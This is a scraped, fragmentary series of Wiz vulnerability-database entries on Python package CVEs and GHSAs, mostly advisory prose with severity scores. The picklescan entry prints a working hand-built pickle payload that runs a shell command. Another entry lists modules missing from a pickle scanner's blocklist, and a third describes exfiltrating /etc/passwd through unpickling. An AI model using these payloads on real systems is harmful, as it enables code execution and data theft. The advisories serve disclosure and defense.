CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2026-25478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-25478 [HIGH] CVE-2026-25478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25478 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, CORSConfig.allowed_origins_regex is constructed using a regex built from configured allowlist values and used with fullmatch() for validation. Because metacharacters are not escaped, a malicious origin can match unexpectedly. The check relies on allowed_origins_regex.fullmatch(origin). This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected pac
Wiz
GHSA-83pf-v6qq-pwmr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-83pf-v6qq-pwmr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-83pf-v6qq-pwmr :
Python vulnerability analysis and mitigation
## Our assessment
imtplib
imaplib
ftplib
poplib
telnetlib
nntplib
UnusedVariables
## Original report
## Summary
check_safety()
--check-safety
LIKELY_SAFE
smtplib.SMTP
imaplib.IMAP4
ftplib.FTP
poplib.POP3
telnetlib.Telnet
nntplib.NNTP
## Root Cause 1: Incomplete blocklist (fixed in PR #233)
fickling/fickle.py
UNSAFE_IMPORTS
fickling/analysis.py
UnsafeImportsML.UNSAFE_MODULES
smtplib
SMTP
25
TCP connect, reads SMTP banner, sends EHLO
imaplib
IMAP4
143
TCP connect, reads IMAP capability banner
ftplib
FTP
21
TCP connect, reads FTP welcome banner
poplib
POP3
110
TCP connect, reads POP3 greeting
telnetlib
Telnet
23
TCP connect
nntplib
NNTP
119
TCP connect, NNTP handshake
Wiz
CVE-2026-35523 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-35523 [HIGH] CVE-2026-35523 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35523 :
Python vulnerability analysis and mitigation
0.312.3
connection_init
on_ws_connect
connection_init
on_ws_connect
subscription_protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL]
Source : NVD
## 7.5
Score
Published April 6, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
strawberry-graphql
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 06, 2026
Wiz
GHSA-qvc2-mg72-jjhx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-qvc2-mg72-jjhx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-qvc2-mg72-jjhx :
Python vulnerability analysis and mitigation
## Summary
sanitize_dom()
style
script
## Details
script
style
```python
_LITERAL_TEXT_SERIALIZATION_ELEMENTS = frozenset({"script", "style"})

def _serialize_text_for_parent(text: str | None, parent_name: str | None) -> str:
    if not text:
        return ""
    if parent_name in _LITERAL_TEXT_SERIALIZATION_ELEMENTS:
        return text
    return _escape_text(text)
```
Source : NVD
## 5.3
Score
Published March 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity MEDIUM Has
Wiz
CVE-2026-27948 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-27948 [MEDIUM] CVE-2026-27948 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27948 :
Python vulnerability analysis and mitigation
?setck=...
Source : NVD
## 6.1
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copyparty
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-25604 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-25604 [MEDIUM] CVE-2026-25604 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25604 :
Python vulnerability analysis and mitigation
In the AWS Auth Manager, the origin of the SAML authentication was used as provided by the client and not verified against the actual instance URL.
This allowed gaining access to different instances with potentially different access controls by reusing a SAML response from another instance.
You should upgrade to version 9.22.0 of the provider if you use the AWS Auth Manager.
Source : NVD
## 5.4
Score
Published March 9, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-2
airflow-3
Wiz
CVE-2026-25650 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-25650 [MEDIUM] CVE-2026-25650 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25650 :
Python vulnerability analysis and mitigation
MCP Salesforce Connector is a Model Context Protocol (MCP) server implementation for Salesforce integration. Prior to 0.1.10, arbitrary attribute access leads to disclosure of Salesforce auth token. This vulnerability is fixed in 0.1.10.
Source : NVD
## 6.6
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-salesforce-connector
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 08, 2026
Wiz
CVE-2025-69534 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-69534 [HIGH] CVE-2025-69534 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69534 :
Python vulnerability analysis and mitigation
Python-Markdown version 3.8 contains a vulnerability where malformed HTML-like sequences can cause html.parser.HTMLParser to raise an unhandled AssertionError during Markdown parsing. Because Python-Markdown does not catch this exception, any application that processes attacker-controlled Markdown may crash. This enables remote, unauthenticated Denial of Service in web applications, documentation systems, CI/CD pipelines, and any service that renders untrusted Markdown. The issue was acknowledged by the vendor and fixed in version 3.8.1. This issue causes a remote Denial of Service in any application parsing untrusted Markdown, and can lead to Information Disclosure through uncaught exceptions.
Source : NVD
## 7.5
Score
Wiz
CVE-2025-68158 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2025-68158 [MEDIUM] CVE-2025-68158 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68158 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under state {app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6.
Source : NVD
## 8.8
Score
Published January 8, 2026
Severity HIGH
CNA Score 5.7
Affected Technologies
Python
MinimOS
Has Public Exploit Yes
Has CIS
Wiz
CVE-2025-14542 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-14542 [HIGH] CVE-2025-14542 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14542 :
Python vulnerability analysis and mitigation
The vulnerability arises when a client fetches a tool's JSON specification, known as a Manual, from a remote Manual Endpoint. While a provider may initially serve a benign manual (e.g., one defining an HTTP tool call), earning the client's trust, a malicious provider can later change the manual to exploit the client.
Source : NVD
## 7.5
Score
Published December 13, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
utcp
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
Wiz
CVE-2026-22250 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.5
CVE-2026-22250 [LOW] CVE-2026-22250 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22250 :
Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, the SSL verification would be skipped for some crafted URLs. This vulnerability is fixed in 1.17.0.
Source : NVD
## 5.5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 2.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MEDIUM No Fix Added at: Jan 13, 2026
pip Severity LOW Has Fix Added at: Jan 13, 2026
Ubuntu 18.0
Wiz
GHSA-x843-g5mx-g377 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-x843-g5mx-g377 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-x843-g5mx-g377 :
Python vulnerability analysis and mitigation
## Summary
operator.methodcaller
## Details
The attack payload executes in the following steps:
operator.methodcaller
reduce
Then, when the victim checks whether the pickle file is safe using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
## PoC
```python
import pickle
import pickletools

opcode1 = b'''cbuiltins
__import__
(Vos
tRp0
0coperator
methodcaller
(Vsystem
Vecho "pwned by operator.methodcaller"
tR(g0
tR.'''

pickletools.dis(opcode1)
pickle.loads(opcode1)
```
This PoC can't be easily created by pickle.dumps, therefore it was manually built.
## Impact
Any organization or indiv
Wiz
CVE-2026-27953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-27953 [HIGH] CVE-2026-27953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27953 :
Python vulnerability analysis and mitigation
ormar is an async mini ORM for Python. Versions 0.23.0 and below are vulnerable to a Pydantic validation bypass through the model constructor: by injecting `"pk_only": true` into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary `excluded` parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity vio
Wiz
CVE-2026-25632 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-25632 [CRITICAL] CVE-2026-25632 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25632 :
Python vulnerability analysis and mitigation
EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deserializer (my_load_from_json) that supports a type field. When type is present, the deserializer dynamically imports an attacker-specified module/class and instantiates it with attacker-supplied arguments. This allows invoking dangerous classes such as subprocess.Popen, which can lead to OS command execution during JSON parsing. This also affects the loading of JSON files. This vulnerability is fixed in 0.16.1.
Source : NVD
## 10
Score
Published February 6, 2026
Severity CRITICA
Wiz
CVE-2026-32875 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32875 [HIGH] CVE-2026-32875 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32875 :
Python vulnerability analysis and mitigation
UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.10 through 5.11.0 are vulnerable to buffer overflow or infinite loop through large indent handling. ujson.dumps() crashes the Python interpreter (segmentation fault) when the product of the indent parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the indent is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service. To be vulnerable, a service must call ujson.dump()/ujson.dumps()/ujson.encode() whilst giving untrusted users control ove
Wiz
CVE-2026-25138 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25138 [MEDIUM] CVE-2026-25138 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25138 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Prior to versions 35.8.3, 38.5.4, and 39.3.1, the WebUI login endpoint returns distinct error messages depending on whether a supplied username exists, allowing unauthenticated attackers to enumerate valid usernames. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 5.3
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affect
Wiz
CVE-2026-27888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-27888 [MEDIUM] CVE-2026-27888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27888 :
Python vulnerability analysis and mitigation
xfa
/FlateDecode
Source : NVD
## 6.6
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar 02, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 02, 2026
Echo Severity HIGH No Fix Added at: Mar 02, 2026
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-32274 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32274 [HIGH] CVE-2026-32274 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32274 :
Python vulnerability analysis and mitigation
Black is the uncompromising Python code formatter. Prior to 26.3.1, Black writes a cache file, the name of which is computed from various formatting options. The value of the --python-cell-magics option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. Fixed in Black 26.3.1.
Source : NVD
## 8.7
Score
Published March 12, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libr
Wiz
CVE-2026-24489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24489 [MEDIUM] CVE-2026-24489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24489 :
Python vulnerability analysis and mitigation
\r\n
\n
\x00
_sanitize_header()
\r
\n
\x00
Source : NVD
## 5.3
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gakido
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 27, 2026
Wiz
CVE-2026-27905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27905 [HIGH] CVE-2026-27905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27905 :
Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.36, the safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem. This vulnerability is fixed in 1.4.36.
Source : NVD
## 8.6
Score
Published March 3, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exp
Wiz
CVE-2026-21871 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21871 [MEDIUM] CVE-2026-21871 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21871 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.13.0 to 3.4.1, there is an XSS risk in NiceGUI when developers pass attacker-controlled strings into ui.navigate.history.push() or ui.navigate.history.replace(). These helpers are documented as History API wrappers for updating the browser URL without a page reload. However, if the URL argument is embedded into generated JavaScript without proper escaping, a crafted payload can break out of the intended string context and execute arbitrary JavaScript in the victim's browser. Applications that do not pass untrusted input into ui.navigate.history.push/replace are not affected. This issue has been patched in version 3.5.0.
Source : NVD
## 6.1
Score
Published January 8,
Wiz
GHSA-9726-w42j-3qjr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9726-w42j-3qjr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9726-w42j-3qjr :
Python vulnerability analysis and mitigation
## Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
## Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
## PoC
import
Wiz
The CVE database: vulnerability intelligence curated by Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] The CVE database: vulnerability intelligence curated by Wiz | Wiz
## Wiz vulnerability database
A comprehensive resource for tracking high-profile vulnerabilities in cloud environments, tailored to security teams and cloud professionals
Learn how Wiz detects exploitable vulnerabilities across cloud workloads. Watch the 12-minute demo
## Browse by technology
## Popular filters
## High profile
| CVE ID | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Publication date |
|---|---|---|---|---|---|---|---|
| CVE-2026-35616 | CRITICAL | 9.8 | FortiClient EMS | cpe:2.3:a:fortinet:forticlient_enterprise_management_server | Yes | Yes | Apr 04, 2026 |
| GHSA-69fq-xp46-6x23 | CRITICAL | 9.4 | N/A | github.com/aquasecurity/trivy | No | Yes | Mar 24, 2026 |
| CVE-2026-3055 | CRITICAL | 9.3 | Citrix ADC VPX | cpe:2.3:a:citrix:netscaler_appli | | | |
Wiz
CVE-2026-33139 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-33139 [HIGH] CVE-2026-33139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33139 :
Python vulnerability analysis and mitigation
PySpector is a static analysis security testing (SAST) framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')), the outer call's func node is of type ast.Call, causing resolve_name() to return None and the security check to be silently skipped. The plug
Wiz
CVE-2026-26220 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-26220 [CRITICAL] CVE-2026-26220 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26220 :
Python vulnerability analysis and mitigation
LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution.
Source : NVD
## 9.3
Score
Published February 17, 2026
Severity CRITICAL
CNA Score 9.3
High-profile Vulnerability Yes
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 74.4
Exploitation Probabi
Wiz
CVE-2026-26198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-26198 [CRITICAL] CVE-2026-26198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26198 :
Python vulnerability analysis and mitigation
sqlalchemy.text()
min()
max()
QuerySet
sum()
avg()
is_numeric
min()
max()
Source : NVD
## 7.5
Score
Published February 24, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ormar
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Feb 24, 2026
Debian 14 Severity HIGH Has Fix Added at: Feb 24, 2026
Echo Severity HIGH No Fix Added at: Feb 24, 2026
pip Severity CRITICAL Has Fix Added at: Feb 24, 2026
Wiz
CVE-2025-70887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-70887 [HIGH] CVE-2025-70887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70887 :
Python vulnerability analysis and mitigation
An issue in ralphje Signify before v0.9.2 allows a remote attacker to escalate privileges via the signed_data.py and context.py components.
Source : NVD
## 8.8
Score
Published March 25, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
signify
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Nix Severity HIGH Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-34073 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-34073 [LOW] CVE-2026-34073 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34073 :
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to version 46.0.6, DNS name constraints were only validated against SANs within child certificates, and not the "peer name" presented during each validation. Consequently, cryptography would allow a peer named bar.example.com to validate against a wildcard leaf certificate for *.example.com, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for bar.example.com. This issue has been patched in version 46.0.6.
Source : NVD
## 1.7
Score
Published March 31, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
Mitmproxy
Has Public Exploit No
Has CISA KEV Explo
Wiz
GHSA-78cv-mqj4-43f7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-78cv-mqj4-43f7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-78cv-mqj4-43f7 :
Python vulnerability analysis and mitigation
domain
path
samesite
RequestHandler.set_cookie
Source : NVD
## 5.4
Score
Published March 11, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tornado
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 12, 2026
Wiz
CVE-2025-66645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-66645 [HIGH] CVE-2025-66645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66645 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to directory traversal through the App.add_media_files() function, which allows a remote attacker to read arbitrary files on the server filesystem. This issue is fixed in version 3.4.0.
Source : NVD
## 7.5
Score
Published December 9, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 77.6
Exploitation Probability (EPSS) 1.1
Affected packages and libraries
nicegui
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 09, 2025
Wiz
CVE-2026-27024 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27024 [MEDIUM] CVE-2026-27024 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27024 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires accessing the children of a TreeObject, for example as part of outlines. This vulnerability is fixed in 6.7.1.
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Chainguard Has Fix Added at: Feb 21, 2026
Debian 11, 12, 13 Severity
Wiz
CVE-2026-27809 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-27809 [MEDIUM] CVE-2026-27809 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27809 :
Python vulnerability analysis and mitigation
psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to version 1.12.2, when a PSD file contains malformed RLE-compressed image data (e.g. a literal run that extends past the expected row size), decode_rle() raises ValueError which propagated all the way to the user, crashing psd.composite() and psd-tools export. decompress() already had a fallback that replaces failed channels with black pixels when result is None, but it never triggered because the ValueError from decode_rle() was not caught. The fix in version 1.12.2 wraps the decode_rle() call in a try/except so the existing fallback handles the error gracefully.
Source : NVD
## 6.8
Score
Published February 26, 2026
Severity MEDIUM
CNA
Wiz
CVE-2026-1778 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-1778 [HIGH] CVE-2026-1778 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1778 :
Python vulnerability analysis and mitigation
Amazon SageMaker Python SDK before v3.1.1 or v2.256.0 disables TLS certificate verification for HTTPS connections made by the service when a Triton Python model is imported, incorrectly allowing for requests with invalid and self-signed certificates to succeed.
Source : NVD
## 8.2
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sagemaker
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CV
Wiz
CVE-2026-25736 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25736 [MEDIUM] CVE-2026-25736 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25736 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Wiz
CVE-2026-21851 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21851 [MEDIUM] CVE-2026-21851 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21851 :
Python vulnerability analysis and mitigation
_download_from_ngc_private()
zipfile.ZipFile.extractall()
safe_extract_member()
Source : NVD
## 5.3
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
monai
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 06, 2026
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
